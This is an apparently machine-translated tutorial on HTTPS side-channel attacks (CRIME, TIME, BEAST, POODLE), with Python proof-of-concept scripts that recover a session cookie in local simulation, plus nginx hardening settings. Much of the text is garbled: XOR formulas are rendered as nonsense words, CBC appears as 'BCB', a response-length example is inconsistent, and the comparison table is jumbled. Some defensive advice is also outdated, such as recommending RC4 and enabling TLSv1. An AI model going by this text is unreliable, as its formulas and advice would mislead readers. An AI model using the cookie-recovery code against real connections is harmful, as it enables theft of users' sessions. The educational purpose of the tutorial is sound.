Common HTTPS attack methods
0x00 background
Study common https attack methods
Beast crime breach, and puts forward some suggestions for secure deployment of https Based on https features.
HTTPS attacks are mostly used in man-in-the-middle attacks. They are mainly used to perform side-channel-attack Based on the compression algorithm used by HTTPS and the CBC encryption mode. The prerequisites for these attacks are harsh, and the victim host must submit many requests to collect sufficient information to decrypt key data.
Common attack methods include BEAST Lucky-13 RC4 Biases crime time breach. This section mainly introduces three of them.
0x01 CRIME
Compression Ratio Info-leak Made Easy
Attack principles
Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response length.
The following is the https header, which can be controlled by the get request address and Cookie. Then, the attacker only needs to constantly change the guess string at the GET address to guess.
GET /sessionid=a HTTP/1.1Host: bank.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924GET /sessionid=a HTTP/1.1Host: bank.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)Gecko/20100101 Firefox/16.0Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924
For example, the Response length is 1000 bytes.
GET /sessionid=d HTTP/1.1Host: bank.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)Gecko/20100101 Firefox/16.0Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924
When an attacker guesses the first letter of the cookie, the Response length will be reduced to 9999 bytes.
After the Response is encrypted by SSL, if the RC4 encryption mode is used, the length does not change randomly. When the BCB encryption mode is used, the length may slightly change due to padding.
Affected encryption algorithms
Deflate = LZ77 + HuffManGZip = Headers + Data Compressed using Deflate
Attack prerequisites
Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)
Browsers and servers support and use compression algorithms.
Attacks can control the victim to send a large number of requests and control the request content.
Defense methods
The client can upgrade the browser to avoid such attacks.
• Chrome: 21.0.1180.89 and above• Firefox: 15.0.1 and above• Opera: 12.01 and above• Safari: 5.1.7 and above
The server can disable encryption algorithms to prevent such attacks.
Apache
?? SSLCompression flag = "SSLCompression off"
?? GnuTLSPriorities flag = "! COMP-DEFLATE"
Prohibit requests that are too frequent.
Modify the compression algorithm flow. user input data is not compressed.
Randomly add undefined junk data.
Impact Scope
TLS 1.0.SPDY protocol (Google).Applications that uses TLS compression.Mozilla Firefox (older versions) that support SPDY.Google Chrome (older versions) that supported both TLS and SPDY.
POC
This poc does not simulate man-in-the-middle attacks in real environments, but verifies the feasibility of the attacks by using CRIME in python.
import stringimport zlibimport sysimport random charset = string.letters + string.digits COOKIE = ''.join(random.choice(charset) for x in range(30)) HEADERS = ("POST / HTTP/1.1\r\n" "Host: thebankserver.com\r\n" "Connection: keep-alive\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" "Accept: */*\r\n" "Referer: https://thebankserver.com/\r\n" "Cookie: secret="+COOKIE+"\r\n" "Accept-Encoding: gzip,deflate,sdch\r\n" "Accept-Language: en-US,en;q=0.8\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n")BODY = ("POST / HTTP/1.1\r\n" "Host: thebankserver.com\r\n" "Connection: keep-alive\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" "Accept: */*\r\n" "Referer: https://thebankserver.com/\r\n" "Cookie: secret=")cookie = "" def compress(data): c = zlib.compressobj() return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)def getposset(perchar,chars): posset = [] baselen = len(compress(HEADERS+perchar)) for i in chars: t = len(compress(HEADERS+ perchar+i)) if (t<=baselen): posset += i return possetdef doguess(): global cookie while len(cookie)<30: posset = getposset(BODY+cookie,charset) trun = 1 tem_posset = posset while 1<len(posset): tem_body = BODY[trun:] posset = getposset(tem_body+cookie,tem_posset) trun = trun +1 if len(posset)==0: return False cookie += posset[0] print posset[0] return True while BODY.find("\r\n")>=0: if not doguess(): print "(-)Changebody" BODY = BODY[BODY.find("\r\n") + 2:]print "(+)orign cookie"+COOKIEprint "(+)Gotten cookie"+cookie
0x02 TIME
Timing Info-leak Made Easy
Attack principles
Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response time. In fact, TIME and CRIME both use the compression algorithm, but CRIME uses the length information as the aid, and TIME information as the aid.
Unable to render embedded object: File (1.jpg) not found.
For example, when the data length is greater than MTU, It is truncated to two packages for sending, which leads to a large time difference. Attackers keep controlling the packet length around MTU and keep trying to guess the COOKIE .?? Unable to render embedded object: File (qqimage 20140724172.163.jpg) not found.
As shown in, we add Padding to increase the data packet size to be equal to MTU. in Case 1, The extraByte we added overlaps with the data to be guessed because of the compression algorithm, the package length is not increased, but extraByte in Case 2 is inconsistent with the data to be guessed, resulting in subcontracting. Attacks can be divided into two cases, Case1 and Case2, based on different response times.
Attack prerequisites
Attacks can control the victim to send a large number of requests and control the request content.
Stable network environment.
Defense methods
Add a random short-time delay to the Response decryption process.
Block frequent requests within a short period of time.
0x03 BEAST
Browser Exploit Against SSL/TLS
Attack principles
Attackers control the victim to send a large number of requests and use the CBC encryption mode to guess key information.
The CBC mode works in the same way as the ciphertext of the I-1 block when the I block is encrypted. The more formal expression is as follows:
Ci = E (Key, Ci-1 sans Mi)
Obviously, when you encrypt the first block, there is no difference or between the ciphertext of the previous block. Therefore, the standard practice is to generate a random initialization vector (IV ), it is also different from the first plaintext or. The encryption of the first M0 is as follows:
C0 = E (Key, IV limit M0 ).
Then, encrypt the first M1 as follows:
C1 = E (Key, C0 1_m1 ).
Now, unless C0 happens to be the same as IV (this is very impossible), even if M0 = M1, the two inputs are different for the encryption function, so C0 = C1. CBC has two basic usage methods:
Each record is considered independent; an IV is generated for each record
Treat all records as a large object linked together, and continue to use the CBC status between records. This means that the IV of the last record n is the ciphertext of N-1 records.
SSLV3 and TLS1.0 select the second usage. This seems to be an error.
CBC has two basic usage methods:
? 1. Each record is considered independent; an IV is generated for each record
? 2. Treat all records as a large object linked together, and continue to use the CBC status between records. This means that the IV of the last record n is the ciphertext of N-1 records.
SSL 3.0 and TLS1.0 select the second usage. Therefore, the security of the encryption algorithm is generated.
Attackers can replace the data segment to be guessed:
X percentile Ci-1 rjp
When the injected content is encrypted, X is exclusive OR, and the plaintext block sent to the encryption algorithm is as follows:
Ci-1 lead P
If P = Mi, the new ciphertext block will be the same as Ci, which means that your guess is correct.
Attack prerequisites
Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)
Attackers need to obtain some permissions to send sensitive data. To insert your information into the SSL/TLS session.
Attackers need to accurately find the ciphertext segments of sensitive data.
Attacks can control the victim to send a large number of requests and control the request content.
Defense methods
Use the RC4 encryption mode instead of the BCB encryption mode.
Deploy TLS 1.1 or a more advanced version to avoid security issues caused by SSL 3.0/TLS 1.0.
Each fixed byte transmitted on the server changes the encryption key once.
Impact Scope
TLS 1.0.SPDY protocol (Google).Applications that uses TLS compression.Mozilla Firefox (older versions) that support SPDY.Google Chrome (older versions) that supported both TLS and SPDY.
POC
It only simulates the implementation of attack ideas in python, and only guesses the first letter in encoding.
import sysimport stringimport randomfrom Crypto.Cipher import AES key = 'lyp62/22Sh2RlXJF'mode = AES.MODE_CBCvi = '1234567812345678'charset = string.letters + string.digitscookie = ''.join(random.choice(charset) for x in range(30))HEADERS = ("POST / HTTP/1.1\r\n" "Host: thebankserver.com\r\n" "Connection: keep-alive\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" "Accept: */*\r\n" "Referer: https://thebankserver.com/\r\n" "Cookie: secret="+cookie+"\r\n" "Accept-Encoding: gzip,deflate,sdch\r\n" "Accept-Language: en-US,en;q=0.8\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n")global pad_numdef add_padding(plaintext): global pad_num pad_num = 16 - len(plaintext) % 16 for i in range(0,pad_num): plaintext += chr(pad_num) return plaintextdef check_padding(plaintext): global pad_num for i in range(1,pad_num+1): if (plaintext[-i]!=chr(pad_num)): return False return True def encrypto(plaintext): global pad_num obj = AES.new(key,mode,vi) if (len(plaintext) % 16): plaintext = add_padding(plaintext) else: pad_num=0 ciphertext = obj.encrypt(plaintext) if (check_padding(ciphertext)): return ciphertext else: return 0 def decrypto(ciphertext): obj = AES.new(key,mode,vi) plaintext = obj.decrypt(ciphertext) return plaintext def findcookie(): global HEADERS return HEADERS.find('secret=')+7 guess_cookie=''pos_cookie=findcookie()pos_block_s = pos_cookie + 16 - pos_cookie%16HEADERS = HEADERS[:pos_cookie] + (16 - pos_cookie % 16 + 15)*'a' +HEADERS[pos_cookie:]encry_head = encrypto(add_padding(HEADERS))per_per_block = encry_head[pos_block_s - 16:pos_block_s] #Ci-1per_block = encry_head[pos_block_s:pos_block_s+16] #xaft_block = encry_head[pos_block_s+16:pos_block_s+32] #Ci+1for i in charset: guess_block = 'a' * 15 + i insert_block = ''.join(chr(ord(a) ^ ord(b) ^ ord(c)) for a,b,c in zip(per_block,per_per_block,guess_block)) temp_header = HEADERS[:pos_block_s+16] + insert_block + HEADERS[pos_block_s+16:] encry_temp_header = encrypto(add_padding(temp_header)) if (aft_block == encry_temp_header[pos_block_s+32:pos_block_s+48]): print "(+)first byte is:"+iprint "(+)orign cookie:"+cookie
The attacker first uses a Downgrade Attack to allow the browser to use ssl v3.0, and then steals the plaintext transmitted to the user through the defects in ssl v3.0 CBC-mode.
0x04 POODLE
Downgrade Attack
Ssl v3.0 is a protocol that has existed for a long time. Currently, most browsers support this protocol for compatibility, but it is not used first, man-in-the-middle attackers can deny the browser's request to negotiate a high-version protocol and only allow the ssl v3.0 protocol.
Padding Oracle attack
Before the CBC attacks, you can see the following details: Beast, Lucky17, etc.
First, let's look at the CBC-mod encryption and decryption process.
Decryption process
Encryption Process
Verification process
MAC1 = hash (plaintext )?
Ciphertext = Encode (plaintext + MAC1 + Padding, K )? Plaintext = Decode (ciphertext, k)-MAC1-Padding (padding length is identified by the last byte)
MAC2 = hash (plaintext )? If MAC1 = MAC2, the verification is successful. Otherwise, the verification fails.
Tue 2, Tue 3
Padding Oracle attacks generally meet the rule of knowing, seeking, and processing, as shown in figure
? (1) VI? ?
(2) What is the decrypted data called midText?
(3) Plaintext? ?
If we get two of these three values, we can launch another one, because they are together Xor.
Http://drops.wooyun.org/wp-content/uploads/2014/12/file0004.jpg
In the Poodle attack, we will replace the last data block with the data block we want to guess. As shown in.
The direct consequence of this is that the CBC integrity verification fails and the data packet is rejected. We assume that the last data block is composed of padding (in fact, we can control the length of the package to achieve this goal, such as increasing the length of path)
Then, CBC integrity verification will pass only when Plaintext [7] = 7 (block is 16 for 15. If the value is not 7, the correct MAC value will be affected if you delete more or less padding, resulting in verification failure.
Then, we only need to constantly change the value of the last bit of (1) IV until (3) when the last bit of Plaintext is 7 (the CBC is verified, we can launch (2) the last digit of mid text.
POODLE
BEAST
Lucky-13
RC4 BiasesPadding Oracle On Downgraded Legacy Encryptiontext-base-side-channel-attacktime-base-side-channel-attack earlier SSL, man-in-the-middle, a large number of packets, in BCB mode, the lower version of SSL, man-in-the-middle, a large number of data packets, controllable content Sending, response time in BCB mode, large amount of data packets, controllable response time for sending content, controllable content Sending, and RC4 mode? 0x05 Security Configuration suggestions
The security configuration here uses nginx as an example. It is mainly configured in Nginx. conf.
Use a secure SSL encryption protocol.
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Use a strict encryption method.
ssl_ciphers 'ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4';
The server password is preferred.
ssl_prefer_server_ciphers on;
Enable the HSTS protocol.
add_header Strict-Transport-Security max-age=15768000;
Redirection Configuration
server { listen 80; add_header Strict-Transport-Security max-age=15768000; return 301 https://www.yourwebsite.com$request_uri;}
Use a 2048-bit digital certificate
openssl dhparam -out dhparam.pem 2048ssl_dhparam /path/to/dhparam.pem;